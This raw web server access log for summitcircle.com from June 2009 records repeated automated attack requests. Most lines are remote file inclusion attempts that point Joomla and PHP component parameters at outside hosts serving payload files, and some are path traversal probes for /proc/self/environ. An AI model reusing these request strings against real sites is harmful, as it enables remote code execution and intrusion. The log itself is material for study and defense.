70.86.9.234 - - [28/Jun/2009:21:31:46 -0700] "GET /logs/access_081201.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:09 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:09 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:09 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:16 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:16 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:16 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:20 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:21 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:21 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:22 -0700] "GET /logs/access.log/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:22 -0700] "GET /logs/?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 5800 "-" "Mozilla/5.0" "summitcircle.com"
70.86.9.234 - - [28/Jun/2009:21:32:22 -0700] "GET /?sourcedir=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:32:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:32:37 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:32:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:32:39 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:32:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:32:39 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:32:44 -0700] "GET /logs/access_090406.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:32:51 -0700] "GET /logs/access_090119.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
163.20.160.14 - - [28/Jun/2009:21:33:13 -0700] "GET /logs/access_090413.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
163.20.160.14 - - [28/Jun/2009:21:33:13 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
163.20.160.14 - - [28/Jun/2009:21:33:13 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:33:19 -0700] "GET /logs/access_090222.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
69.175.14.66 - - [28/Jun/2009:21:33:19 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:33:27 -0700] "GET /logs/access_090406.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:33:27 -0700] "GET /logs/access_090119.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:35:10 -0700] "GET /logs/access_090222.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
83.13.191.186 - - [28/Jun/2009:21:35:11 -0700] "GET /logs/access.log//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:36:57 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:36:58 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:18 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:18 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:19 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:41 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:44 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:45 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:49 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:50 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:37:51 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:15 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:15 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:38:22 -0700] "GET /logs/access_090119.log//?phpAds_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:38:22 -0700] "GET /?phpAds_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 779 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:38:22 -0700] "GET /logs//?phpAds_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 5805 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:38:22 -0700] "GET /logs/access_090119.log//?phpAds_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:38:22 -0700] "GET /?phpAds_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "XXXXXX" "www.summitcircle.com"
91.195.124.16 - - [28/Jun/2009:21:38:22 -0700] "GET /logs//?phpAds_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5805 "-" "XXXXXX" "www.summitcircle.com"
72.30.78.220 - - [28/Jun/2009:21:38:25 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:38 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:43 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:43 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:44 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:44 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:53 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:38:54 -0700] "GET /logs/access_090209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:09 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:09 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:10 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:15 -0700] "GET /logs/access_090222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:23 -0700] "GET /logs/access_090222.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:24 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:40 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:39:43 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:39:54 -0700] "GET /logs/access.log//_conf/_php-core/common-tpl-vars.php?conf[lang]=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:40:00 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:40:24 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:40:41 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:40:50 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:40:59 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:41:04 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:41:04 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:41:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:41:04 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:41:04 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
89.223.3.98 - - [28/Jun/2009:21:41:04 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:06 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:09 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:09 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:10 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:21 -0700] "GET /logs/access_090413.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:23 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:24 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:25 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:27 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:39 -0700] "GET /logs/access_090119.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:41:51 -0700] "GET /logs/access_090222.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:42:07 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:42:16 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:42:19 -0700] "GET /logs/access_090222.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:42:20 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:42:25 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
195.34.78.110 - - [28/Jun/2009:21:42:35 -0700] "GET /logs/access_090209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:21:42:49 -0700] "GET /logs/access_081201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:21:42:50 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.34 - - [28/Jun/2009:21:42:50 -0700] "GET /logs/access_081201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.34 - - [28/Jun/2009:21:42:50 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.33 - - [28/Jun/2009:21:42:50 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
110.45.144.34 - - [28/Jun/2009:21:42:51 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.f5grafica.com.br/imagens/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
